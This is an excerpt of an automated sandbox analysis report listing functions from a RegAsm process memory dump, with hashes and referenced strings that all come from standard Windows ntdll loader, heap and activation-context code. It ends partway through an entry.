                                                              • Instruction ID: b78f64a06e516b1b340961b014953f60020cedd0ac94aa48a1eb619f781d26b7
                                                              • Opcode Fuzzy Hash: 17f6ea446a3f0db89406f0c54647d1b040dc70c0ee9f22ac26928c0111c7c3f8
                                                              • Instruction Fuzzy Hash: 5F81ACB1E00358AFFB20CF94C945BAEBBB6EB48794FA44119E605B7640C375A944CF60
                                                              Function 02FE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: fb8a0e1a14073fb699d5422603a19c2e3c18917ee05f5d479889c12c019d8e92
                                                              • Instruction ID: 9c1dcaf8339107a60d5b40647001457c6fad14680c4c91e96c32b65381df4f12
                                                              • Opcode Fuzzy Hash: fb8a0e1a14073fb699d5422603a19c2e3c18917ee05f5d479889c12c019d8e92
                                                              • Instruction Fuzzy Hash: 0FD1BF71A00655DFDF22DF68C850AA9BBF2FF4A784F08805DE646AB251CBB4D945CF10
                                                              Function 02F663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: 9c7dd895f3a8df88c30b38dc20d641b27faa072ad062495ec57fc1ecbfa220d9
                                                              • Instruction ID: 8993fe33bc3279fb3125af736c6877fc23410cfbf15b4951d61e4aa521628c74
                                                              • Opcode Fuzzy Hash: 9c7dd895f3a8df88c30b38dc20d641b27faa072ad062495ec57fc1ecbfa220d9
                                                              • Instruction Fuzzy Hash: 77914771F013149BEB35EF54DD58BBA7BA5EF41BD8F100169EB01ABA84D7B89801CB90
                                                              Function 02F2645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 02F89A01
                                                              • apphelp.dll, xrefs: 02F26496
                                                              • LdrpInitShimEngine, xrefs: 02F899F4, 02F89A07, 02F89A30
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 02F89A2A
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 02F899ED
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 02F89A11, 02F89A3A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: 63bbed73988509543aa4573f5011cebe2a3ac30be151d7696b4fbfafe2064c18
                                                              • Instruction ID: 44e497373ccf0732939fac4e30f89731ce63f028e2d57669f851dd42781dcb2f
                                                              • Opcode Fuzzy Hash: 63bbed73988509543aa4573f5011cebe2a3ac30be151d7696b4fbfafe2064c18
                                                              • Instruction Fuzzy Hash: AD51B1716483149FE720EF64CC91B6BB7E9EB857C4F50091AFB8697290DB70E904CB92
                                                              Function 02F6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Loading import redirection DLL: '%wZ', xrefs: 02FA8170
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 02FA81E5
                                                              • LdrpInitializeProcess, xrefs: 02F6C6C4
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 02FA8181, 02FA81F5
                                                              • LdrpInitializeImportRedirection, xrefs: 02FA8177, 02FA81EB
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 02F6C6C3
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: e3d47643e4767260fba7ec473673f8a7e77feba7a5f1243808473e4cccbab7ec
                                                              • Instruction ID: 166404205d37d4f4795aba0a7963bcab060b13c2dfdeb999ff238fab743486b6
                                                              • Opcode Fuzzy Hash: e3d47643e4767260fba7ec473673f8a7e77feba7a5f1243808473e4cccbab7ec
                                                              • Instruction Fuzzy Hash: 913108B17443519BD220EF28DD45E2BB795EF84B94F000568FB856B291D664EC04CFA2
                                                              Function 02F62674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() passed the empty activation context, xrefs: 02FA2165
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02FA2180
                                                              • RtlGetAssemblyStorageRoot, xrefs: 02FA2160, 02FA219A, 02FA21BA
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02FA21BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02FA2178
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02FA219F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: 9b4b5064ecf10eed8553c7eadddded681dedfab630de025d50dfff5ba9dcb52d
                                                              • Instruction ID: 2189ce5a62521e3ff2934dcb34a57e4a5a856c7afa3ba7086befef2fdf2706b5
                                                              • Opcode Fuzzy Hash: 9b4b5064ecf10eed8553c7eadddded681dedfab630de025d50dfff5ba9dcb52d
                                                              • Instruction Fuzzy Hash: FD31D276F40214A7F7219A998C95F6AB769DF94AD4F054069BF09A7140D370DE00C6E1
                                                              Function 02F3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: 725f774b71451e191cf1ed864de285ffec4f866189c09353c59969a79c353560
                                                              • Instruction ID: 0ba26da1d9e1590cafd739acd38a6d616778be7249e3426970cb8578608fd3f0
                                                              • Opcode Fuzzy Hash: 725f774b71451e191cf1ed864de285ffec4f866189c09353c59969a79c353560
                                                              • Instruction Fuzzy Hash: 57C1AC72608382DFD712CF1AC544B6AB7E4BF84798F00496AFAD68B350E734C949CB52
                                                              Function 02F68402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • @, xrefs: 02F68591
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 02F6855E
                                                              • LdrpInitializeProcess, xrefs: 02F68422
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 02F68421
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: 71505a4d4d50a614de1f817cdb2a458babbb0e4b994b73a8d531e803a619b342
                                                              • Instruction ID: b884cbb3b2aaa74a17f75764bf0560d4292be2debcace822c28f920e93a95fe8
                                                              • Opcode Fuzzy Hash: 71505a4d4d50a614de1f817cdb2a458babbb0e4b994b73a8d531e803a619b342
                                                              • Instruction Fuzzy Hash: B0915A71908344AFE721DA65CC94F7BBAE9EF847D4F40092EFB8592150E774D908CB62
                                                              Function 02F6273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • .Local, xrefs: 02F628D8
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02FA21D9, 02FA22B1
                                                              • SXS: %s() passed the empty activation context, xrefs: 02FA21DE
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02FA22B6
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: 7e351de37fca3e5e66b46bd562311839d88d4a5bbe7bb68276182bbe0c4cccc8
                                                              • Instruction ID: 9012e15d12f271efed9938946aff0c1ac9f668151e9c5fd149db5c9e54ea4d20
                                                              • Opcode Fuzzy Hash: 7e351de37fca3e5e66b46bd562311839d88d4a5bbe7bb68276182bbe0c4cccc8
                                                              • Instruction Fuzzy Hash: 37A19D71E002299BDB24DF64DC98BA9B3B5FF58398F1441EADE48A7250D7309E80CF90
                                                              Function 02F64AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlDeactivateActivationContext, xrefs: 02FA3425, 02FA3432, 02FA3451
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 02FA342A
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 02FA3456
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 02FA3437
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              • Opcode ID: d976dfccbb1d1c326c63b0e2beaf40818734f8cd0f3bb5c4d8db9425a4a33a14
                                                              • Instruction ID: 615d9890e470e0208bfcec9ae3e1e58f21bd449afbed70a6d95885a252800984
                                                              • Opcode Fuzzy Hash: d976dfccbb1d1c326c63b0e2beaf40818734f8cd0f3bb5c4d8db9425a4a33a14
                                                              • Instruction Fuzzy Hash: FC612572A047129BD732EF18C955B3AB7A6EF80BD4F548569FE559B340DB30E800CB91
                                                              Function 02F364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 02F9106B
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 02F910AE
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 02F91028
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 02F90FE5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: c75f8524bcedd7e5d8d43cae369617def8df856814143e351a43130777a86b38
                                                              • Instruction ID: a92820970fab5083a0afec8810cfd814d2fcfd241f9c4dc0008afeed67df5b3f
                                                              • Opcode Fuzzy Hash: c75f8524bcedd7e5d8d43cae369617def8df856814143e351a43130777a86b38
                                                              • Instruction Fuzzy Hash: 2A71DCB2904304AFDB61EF14CC84B9B7BA9AF457A4F400469FB498B286D734D188CFD2
                                                              Function 02F5245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • apphelp.dll, xrefs: 02F52462
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 02F9A992
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 02F9A9A2
                                                              • LdrpDynamicShimModule, xrefs: 02F9A998
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: 799e9598d7a7a4849da1504ec6db5a667394881eefd4fcd235010ebe9537622a
                                                              • Instruction ID: cb8931aae224678b272564486f55a4b2858fb310f80f1d0cc9e32142e4e1e30e
                                                              • Opcode Fuzzy Hash: 799e9598d7a7a4849da1504ec6db5a667394881eefd4fcd235010ebe9537622a
                                                              • Instruction Fuzzy Hash: 84314832A01211EFEF30AF599C91F6AB7B5FB84B94F360159EF01AB245C7B89941CB40
                                                              Function 02F40770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: e9d75e1e7d2ca4fff55263c89b417b9dc10defb9ce22503dff38aea36ee1e15c
                                                              • Instruction ID: 484a159e1e636d2dd17012a3b171f3cef553fce2e45cf030070b036efe793109
                                                              • Opcode Fuzzy Hash: e9d75e1e7d2ca4fff55263c89b417b9dc10defb9ce22503dff38aea36ee1e15c
                                                              • Instruction Fuzzy Hash: 0DF19931B00605DFEB19CF68C990B6ABBB5FF44384F1441A9E6169B391DB74E981CF90
                                                              Function 02F2A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: c32f9a988065948e654dd424284b7aa101b4307c9e6d3ae604ec6e05767bb7fa
                                                              • Instruction ID: 1958c3bfb66959d5f9f647e7df55495a2a46c0d08e863e6496d5c6c720d9c83f
                                                              • Opcode Fuzzy Hash: c32f9a988065948e654dd424284b7aa101b4307c9e6d3ae604ec6e05767bb7fa
                                                              • Instruction Fuzzy Hash: 64A17D71D016299BDB31EF64CC88BAAF7B9EF44744F1001EAEA09A7250D7359E85CF60
                                                              Function 02F6C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 02FA82DE
                                                              • Failed to reallocate the system dirs string !, xrefs: 02FA82D7
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 02FA82E8
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              • Opcode ID: fe6fd8bc674ce151de1b8203d31ae2db4a8be1848d2e871ab9075f46addb2da7
                                                              • Instruction ID: e2e7385d576d6f0ac2be360728e493acc51ea2964f265f4e0185690c22303b62
                                                              • Opcode Fuzzy Hash: fe6fd8bc674ce151de1b8203d31ae2db4a8be1848d2e871ab9075f46addb2da7
                                                              • Instruction Fuzzy Hash: 4D41A471945318ABD720EB64DC48B6B77E9EF447D0F10452AFB89D7250EBB4E804CB91
                                                              Function 02FEC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 02FEC1C5
                                                              • @, xrefs: 02FEC1F1
                                                              • PreferredUILanguages, xrefs: 02FEC212
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: 4014afaa5457e73d4326c5b488c4b3c481b87ffefc3fd1da873a8fdea8c857a7
                                                              • Instruction ID: a3c5d02b082271866695e8c921aebc170b063d87bc7d1769813cd431fadce4eb
                                                              • Opcode Fuzzy Hash: 4014afaa5457e73d4326c5b488c4b3c481b87ffefc3fd1da873a8fdea8c857a7
                                                              • Instruction Fuzzy Hash: 62413172E00219ABDF11DED4C891BEEB7B9AB14B84F14416BEB06B7280D7749A44CB50
                                                              Function 02FC4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: 37962e4731ff5813eedbb1736223b1c455912f4185cb838cbe243105b8eb840e
                                                              • Instruction ID: 068f37f9c9fe23710dc2130c8ac5431af176335d097d1a2f78b28a9f9ccea024
                                                              • Opcode Fuzzy Hash: 37962e4731ff5813eedbb1736223b1c455912f4185cb838cbe243105b8eb840e
                                                              • Instruction Fuzzy Hash: 7641D072A002598BEB26DBA4CE54BEDBBB5EF55384F24049EDA41FB781DB748901CB10
                                                              Function 02FB4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 02FB4888
                                                              • LdrpCheckRedirection, xrefs: 02FB488F
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 02FB4899
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              • Opcode ID: f64feaf9ce9969dd4b2763bc820a47898eea2d507d043ff4bc3f1a1a9ad60ac1
                                                              • Instruction ID: b8ad5a4bd86b4e562cad4d3b232fa92b04c97edd6e477612a414f28079c37e05
                                                              • Opcode Fuzzy Hash: f64feaf9ce9969dd4b2763bc820a47898eea2d507d043ff4bc3f1a1a9ad60ac1
                                                              • Instruction Fuzzy Hash: 0A410632B016949FCF22DE1ADA60EA7B7E4AF497D0F150259EE49D7752D330D800CB91
                                                              Function 02FB20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 02FB20FA
                                                              • Process initialization failed with status 0x%08lx, xrefs: 02FB20F3
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 02FB2104
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: 0bb3ebc0fe8e529ca32b59a737093dd099cffa934b596125e9f33be598be8cba
                                                              • Instruction ID: 61a82ffdcb15a9fd5c4206af214e76496db5581715e18f4e95da52383ed93042
                                                              • Opcode Fuzzy Hash: 0bb3ebc0fe8e529ca32b59a737093dd099cffa934b596125e9f33be598be8cba
                                                              • Instruction Fuzzy Hash: F2F0C275A41218ABFB24E64DDC52FDA3769EF40BD4F50006AFB017B685D6B4A900CE91
                                                              Function 02F403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: 7144864c3a51b5bf0ef8d000a88a3eeeb7727afd387c6a3a03b45fb79ddcedff
                                                              • Instruction ID: 1535730bf643b885f111de85902c7eebf24187770f4e0de71cf0338cae801218
                                                              • Opcode Fuzzy Hash: 7144864c3a51b5bf0ef8d000a88a3eeeb7727afd387c6a3a03b45fb79ddcedff
                                                              • Instruction Fuzzy Hash: 0E713C71E0014A9FDB05DF98C990BAEBBF9AF08784F144069EA05E7251EB74ED41CB61
                                                              Function 02FFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: b0d463210bc01e4a66d60eb971cf7440bc5ab0e187156b185174a7fbf9909a03
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: DCC1D0326043469BD765CF28C840B2BBBE6BF84798F084A2DFB99CA2A0D775D505CF51
                                                              Function 02FAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: 9a06ac5294f2f606bf1c9577e50dd2e490cb21be56752151bff70d819495113c
                                                              • Instruction ID: 860a06b1416434b9eb05b5e3cea6e21350d15564821b167630085e0e2adee094
                                                              • Opcode Fuzzy Hash: 9a06ac5294f2f606bf1c9577e50dd2e490cb21be56752151bff70d819495113c
                                                              • Instruction Fuzzy Hash: 0F613BB2E002189FDB14DFA8C890FAEBBB5FB44784F544079E759EB291D731A940CB50
                                                              Function 02FD43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              • Opcode ID: d7363d827f5b083976f8da1d9f9300c4a78c32ccff143fd7db9d12888b790e3c
                                                              • Instruction ID: e1ae1e5e91cafe450a8731dca44a9b5b7f8575048f3e1a1601855b3a192f0f9c
                                                              • Opcode Fuzzy Hash: d7363d827f5b083976f8da1d9f9300c4a78c32ccff143fd7db9d12888b790e3c
                                                              • Instruction Fuzzy Hash: 3D510971E0021DAEDF11DFA5CD90BEEBBBAEB44798F14052AEA11B7290D7309D45CB60
                                                              Function 02F304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 02F3063D
                                                              • kLsE, xrefs: 02F30540
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2377039282.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2f00000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              • Opcode ID: 3f92f7e0872c713ff4f8a9363af3336b86078a6e39b28e1c5de863e903c9aab6
                                                              • Instruction ID: 1582742c672b7610ccb0bfe8d357abbe39b43911fda2702875720384a67eae71
